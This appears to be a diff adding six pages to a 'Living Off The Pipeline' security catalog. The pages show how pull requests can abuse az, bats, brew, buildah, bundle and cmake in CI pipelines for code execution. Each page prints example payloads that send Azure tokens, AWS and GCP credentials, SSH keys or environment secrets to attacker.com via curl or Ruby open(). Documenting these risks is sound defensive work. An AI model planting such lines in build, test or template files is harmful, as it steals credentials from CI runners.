boostsecurityio · fproulx-boostsecurity · Oct 20, 2025
@@ -0,0 +1,62 @@
+---
+layout: tool
+title: az
+parent: Living Off The Pipeline
+nav_order: 28
+---
+
+## Living Off The Pipeline - az (Azure CLI)
+
+The Azure CLI (`az`) is the command-line tool for managing Azure resources. It can be abused as a "Living Off The Pipeline" (LOTP) tool when sub-commands like `az deployment group create` are used to process malicious, repository-local template files.
+
+### First-Order LOTP Tool
+
+`az` is a **First-Order LOTP Tool**. It provides Remote Code Execution (RCE) by processing a malicious Azure Resource Manager (ARM) template that contains an executable script.
+
+#### Malicious Primitive: Remote Code Execution (RCE)
+
+The `az deployment group create` command is used to deploy Azure resources from an ARM template file (e.g., `main.json`). The ARM template specification includes a resource type called `Microsoft.Resources/deploymentScripts`. This resource is designed to run arbitrary PowerShell or Bash scripts as part of a deployment.
+
+An attacker can add a malicious `deploymentScripts` resource to an ARM template in their pull request. When a CI/CD pipeline runs `az deployment group create` on this file, the Azure platform will execute the attacker's script. While the RCE occurs on a temporary Azure container and not the CI runner itself, it executes with the pipeline's cloud identity, giving the attacker a powerful foothold in the target Azure environment.
+
+### Second-Order LOTP Attack Chain
+
+1.  **Attacker's PR:** An attacker submits a pull request with a malicious ARM template file.
+    ```json
+    {
+      "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+      "contentVersion": "1.0.0.0",
+      "resources": [
+        {
+          "type": "Microsoft.Resources/deploymentScripts",
+          "apiVersion": "2020-10-01",
+          "name": "pwnedDeploymentScript",
+          "location": "[resourceGroup().location]",
+          "kind": "AzureCLI",
+          "properties": {
+            "azCliVersion": "2.30.0",
+            "scriptContent": "az account get-access-token --query accessToken -o tsv | curl -X POST -d @- http://attacker.com/",
+            "retentionInterval": "PT1H"
+          }
+        }
+      ]
+    }
+    ```
+
+2.  **Vulnerable Workflow:** The pipeline contains a standard command to deploy the ARM template.
+    ```yaml
+    - name: Deploy to Azure
+      run: az deployment group create --resource-group my-rg --template-file main.json
+    ```
+
+3.  **Execution:**
+    *   The `az deployment group create` command is executed.
+    *   It sends the attacker's malicious template to the Azure Resource Manager.
+    *   Azure creates a temporary container to run the `deploymentScript`.
+    *   The attacker's `scriptContent` is executed, which gets the access token of the pipeline's service principal and exfiltrates it to the attacker's server.
+
+This attack is dangerous because the CI/CD workflow file contains a legitimate command. The malicious payload is hidden within a declarative infrastructure file.
+
+### References
+
+*   [Azure Docs: `deploymentScripts`](https://docs.microsoft.com/en-us/azure/templates/microsoft.resources/deploymentscripts)
@@ -0,0 +1,53 @@
+---
+layout: tool
+title: bats
+parent: Living Off The Pipeline
+nav_order: 30
+---
+
+## Living Off The Pipeline - bats (Bash Automated Testing System)
+
+`Bats` (Bash Automated Testing System) is a testing framework for shell scripts. By its very nature, it is designed to execute code from files within the repository, making it a direct "Living Off The Pipeline" (LOTP) tool.
+
+### First-Order LOTP Tool
+
+`bats` is a **First-Order LOTP Tool**. It provides direct Remote Code Execution (RCE) because its purpose is to execute `.bats` files, which are themselves shell scripts.
+
+#### Malicious Primitive: Remote Code Execution (RCE)
+
+A `bats` test file (`.bats`) is a Bash script with a specialized syntax for defining test cases. The `bats` interpreter executes the shell commands contained within these files.
+
+An attacker can add a malicious command to any `.bats` file in their pull request. When a CI/CD pipeline runs the `bats` command to execute the test suite, it will execute the attacker's payload.
+
+### Second-Order LOTP Attack Chain
+
+1.  **Attacker's PR:** An attacker submits a pull request with a new or modified test file containing a malicious payload.
+    ```bash
+    #!/usr/bin/env bats
+
+    @test "Test feature X" {
+      # Malicious payload placed within a seemingly legitimate test
+      curl --data-binary @$HOME/.aws/credentials http://attacker.com/
+
+      # Legitimate test logic can follow
+      run some_command
+      [ "$status" -eq 0 ]
+    }
+    ```
+
+2.  **Vulnerable Workflow:** The pipeline contains a standard command to run the test suite.
+    ```yaml
+    - name: Run unit tests
+      run: bats tests/
+    ```
+
+3.  **Execution:**
+    *   The `bats tests/` command is executed.
+    *   The `bats` interpreter finds and executes all `.bats` files in the `tests/` directory.
+    *   When it executes the attacker's test case, the malicious `curl` command is run, exfiltrating credentials from the CI runner.
+
+This attack is dangerous because the malicious code is hidden in test files, which are often assumed to be safe, and the CI/CD command is completely benign.
+
+### References
+
+*   [Bats-core Documentation](https://bats-core.readthedocs.io/en/stable/)
@@ -0,0 +1,63 @@
+---
+layout: tool
+title: brew
+tags: [cli, config-file, eval-ruby, rce]
+references:
+- https://github.com/Homebrew/homebrew-bundle
+- https://docs.brew.sh/Formula-Cookbook
+files: [Brewfile]
+---
+
+## Living Off The Pipeline - brew (Homebrew)
+
+`Homebrew` is a popular package manager for macOS and Linux. Its reliance on executable Ruby scripts ("formulae") and third-party repositories ("taps") makes it a powerful "Living Off The Pipeline" (LOTP) tool.
+
+### First-Order LOTP Tool
+
+`brew` is a **First-Order LOTP Tool**. It provides direct Remote Code Execution (RCE) by design, as its purpose is to execute installation scripts from potentially attacker-controlled sources.
+
+#### Malicious Primitive: Remote Code Execution (RCE)
+
+The primary vector for `brew` is the `Brewfile`, which is a repository-local file that lists project dependencies. An attacker can add two key items to this file:
+1.  A `tap` line, which points to their own malicious Git repository containing Homebrew formulae.
+2.  A `brew` line, which instructs Homebrew to install a formula from that malicious tap.
+
+A Homebrew formula is a Ruby script. The `install` method of a formula can contain arbitrary shell commands. When a CI/CD pipeline runs `brew bundle` to install dependencies from the `Brewfile`, it will execute the `install` method of the attacker's formula.
+
+### Real-World Attack Scenario
+
+1.  **Attacker's PR:** An attacker submits a pull request containing a modified `Brewfile`.
+    ```ruby
+    # Brewfile
+    tap "attacker/homebrew-pwn"
+    brew "malicious-formula"
+    ```
+
+2.  **Attacker's Tap:** The attacker hosts a public Git repository (e.g., `github.com/attacker/homebrew-pwn`) containing their malicious formula.
+    ```ruby
+    # malicious-formula.rb
+    class MaliciousFormula < Formula
+      homepage "https://attacker.com"
+      url "https://attacker.com/v1.0.tar.gz" # Dummy URL
+      sha256 "..." # Dummy checksum
+
+      def install
+        # Malicious payload
+        system "curl --data-binary @$HOME/.ssh/id_rsa http://attacker.com/"
+      end
+    end
+    ```
+
+3.  **Vulnerable Workflow:** The pipeline contains a standard command to install dependencies.
+    ```yaml
+    - name: Install Homebrew dependencies
+      run: brew bundle
+    ```
+
+4.  **Execution:**
+    *   The `brew bundle` command is executed.
+    *   It reads the `Brewfile`, adds the attacker's `tap`, and then proceeds to install `malicious-formula`.
+    *   To install the formula, Homebrew executes the Ruby code in the `install` method.
+    *   The attacker's `system` command runs, exfiltrating sensitive files.
+
+This attack is dangerous because the CI/CD workflow file is benign. The malicious payload is hidden in a remote repository that is trusted and executed by the package manager.
@@ -0,0 +1,56 @@
+---
+layout: tool
+title: buildah
+parent: Living Off The Pipeline
+nav_order: 35
+---
+
+## Living Off The Pipeline - buildah
+
+`buildah` is a command-line tool for building OCI-compliant container images. It serves as a direct alternative to `docker build` and shares the same powerful "Living Off The Pipeline" (LOTP) vector: the `Containerfile` (or `Dockerfile`).
+
+### First-Order LOTP Tool
+
+`buildah` is a **First-Order LOTP Tool**. It provides direct Remote Code Execution (RCE) by processing a malicious `Containerfile` that contains executable instructions.
+
+#### Malicious Primitive: Remote Code Execution (RCE)
+
+The `buildah bud` (build-using-dockerfile) command builds an image from a `Containerfile`. This file format includes the `RUN` instruction, which is designed to execute arbitrary shell commands to build up the layers of the container image.
+
+An attacker can add a malicious `RUN` instruction to a `Containerfile` in their pull request. When a CI/CD pipeline uses `buildah bud` to build an image from this file, it will execute the attacker's payload on the runner.
+
+### Second-Order LOTP Attack Chain
+
+1.  **Attacker's PR:** An attacker submits a pull request with a modified `Containerfile` containing a malicious `RUN` instruction.
+    ```dockerfile
+    # Containerfile
+    FROM ubi8
+
+    # Legitimate build steps
+    RUN dnf install -y httpd
+
+    # Malicious payload
+    RUN curl --data-binary @$HOME/.gcp/credentials.json http://attacker.com/
+
+    # More legitimate steps
+    COPY . /var/www/html
+    ```
+
+2.  **Vulnerable Workflow:** The pipeline contains a standard command to build the container image.
+    ```yaml
+    - name: Build application image
+      run: buildah bud -t my-app:latest .
+    ```
+
+3.  **Execution:**
+    *   The `buildah bud` command is executed.
+    *   It reads the `Containerfile` from the attacker's pull request.
+    *   It executes the `RUN` instructions in order.
+    *   The attacker's `curl` command runs, exfiltrating cloud credentials from the CI runner.
+
+This attack is dangerous because the CI/CD workflow file contains a benign and common command. The malicious payload is hidden within a build definition file.
+
+### References
+
+*   [Buildah Tutorial](https://github.com/containers/buildah/blob/main/docs/tutorials/buildah_tutorial.md)
+*   [Dockerfile `RUN` instruction](https://docs.docker.com/engine/reference/builder/#run)
@@ -0,0 +1,55 @@
+---
+layout: tool
+title: bundle
+parent: Living Off The Pipeline
+nav_order: 8
+---
+
+## Living Off The Pipeline - bundle (Bundler)
+
+Bundler is the standard dependency manager for Ruby. It can be abused as a "Living Off The Pipeline" (LOTP) tool by manipulating the `Gemfile` to load a malicious, local version of a gem, leading to Remote Code Execution (RCE).
+
+### First-Order LOTP Tool
+
+Bundler is a **First-Order LOTP Tool**. It provides direct RCE when it processes a malicious `Gemfile`.
+
+#### Malicious Primitive: Remote Code Execution (RCE)
+
+The `Gemfile` allows developers to specify a dependency's source using a local `path`. This feature, intended for development, can be weaponized by an attacker in a pull request.
+
+An attacker can replace a legitimate gem with a malicious local version that contains an `extconf.rb` script. This script is a standard part of gems that build C extensions, and it is executed by the `bundle install` command. The attacker places their malicious payload in this script.
+
+### Second-Order LOTP Attack Chain
+
+1.  **Attacker's PR:** An attacker submits a pull request containing:
+    *   A modified `Gemfile` that points a common gem to a local path.
+        ```ruby
+        # Gemfile
+        gem 'nokogiri', path: './malicious/nokogiri'
+        ```
+    *   A malicious version of the gem at that path, including a malicious `extconf.rb` script.
+        ```ruby
+        # malicious/nokogiri/extconf.rb
+        require 'open-uri'
+        # Malicious payload
+        open("http://attacker.com/?data=#{ENV['SUPER_SECRET']}")
+        ```
+
+2.  **Vulnerable Workflow:** The pipeline contains a completely standard command to install dependencies.
+    ```yaml
+    - name: Install Ruby gems
+      run: bundle install
+    ```
+
+3.  **Execution:**
+    *   The `bundle install` command reads the `Gemfile`.
+    *   It finds the `path` directive and uses the attacker's local, malicious version of the `nokogiri` gem.
+    *   During the installation process, Bundler executes the malicious `extconf.rb` script to (purportedly) build the native extension.
+    *   The attacker's payload runs, leading to RCE.
+
+This attack is dangerous because the CI/CD workflow file is benign, and the malicious code is hidden in a file (`extconf.rb`) that is expected to be executed during a normal installation.
+
+### References
+
+*   [Bundler `path` option](https://bundler.io/man/gemfile.5.html#PATH)
+*   [RubyGems: C Extensions](https://guides.rubygems.org/c-extensions/)
@@ -0,0 +1,52 @@
+---
+layout: tool
+title: cmake
+tags: [cli, config-file, eval-sh]
+references:
+- https://cmake.org/cmake/help/latest/command/execute_process.html
+files: [CMakeLists.txt]
+---
+
+## Living Off The Pipeline - cmake
+
+`CMake` is a cross-platform build system generator. It uses a script file named `CMakeLists.txt` to define a project's build process. This script file is a powerful vector for "Living Off The Pipeline" (LOTP) attacks.
+
+### First-Order LOTP Tool
+
+`cmake` is a **First-Order LOTP Tool**. It provides direct Remote Code Execution (RCE) by design, as its primary configuration file is an executable script.
+
+#### Malicious Primitive: Remote Code Execution (RCE)
+
+The `CMakeLists.txt` file is not just a data file; it is a script that is interpreted and executed by the `cmake` command. This script can contain the `execute_process()` command, which is used to run arbitrary shell commands.
+
+An attacker can add a malicious `execute_process()` command to the `CMakeLists.txt` file in their pull request. When a CI/CD pipeline runs the standard `cmake .` command to configure the project, it will execute the attacker's payload.
+
+### Real-World Attack Scenario
+
+1.  **Attacker's PR:** An attacker submits a pull request with a modified `CMakeLists.txt` file containing a malicious `execute_process` command.
+    ```cmake
+    # CMakeLists.txt
+    cmake_minimum_required(VERSION 3.10)
+    project(LegitProject)
+
+    # Malicious payload that runs during the configuration step
+    execute_process(COMMAND sh -c "curl --data-binary @$HOME/.ssh/id_rsa http://attacker.com/")
+
+    # Legitimate build targets
+    add_executable(my_app main.cpp)
+    ```
+
+2.  **Vulnerable Workflow:** The pipeline contains a completely standard set of commands to configure and build a CMake-based project.
+    ```yaml
+    - name: Configure project
+      run: cmake .
+    - name: Build project
+      run: make
+    ```
+
+3.  **Execution:**
+    *   The `cmake .` command is executed.
+    *   CMake parses the `CMakeLists.txt` file and immediately executes the `execute_process()` command.
+    *   The attacker's `curl` command runs, exfiltrating sensitive files from the CI runner. The RCE happens during the *configuration* phase, before any compilation begins.
+
+This attack is dangerous because the CI/CD workflow file is benign. The malicious payload is hidden inside the project's main build script.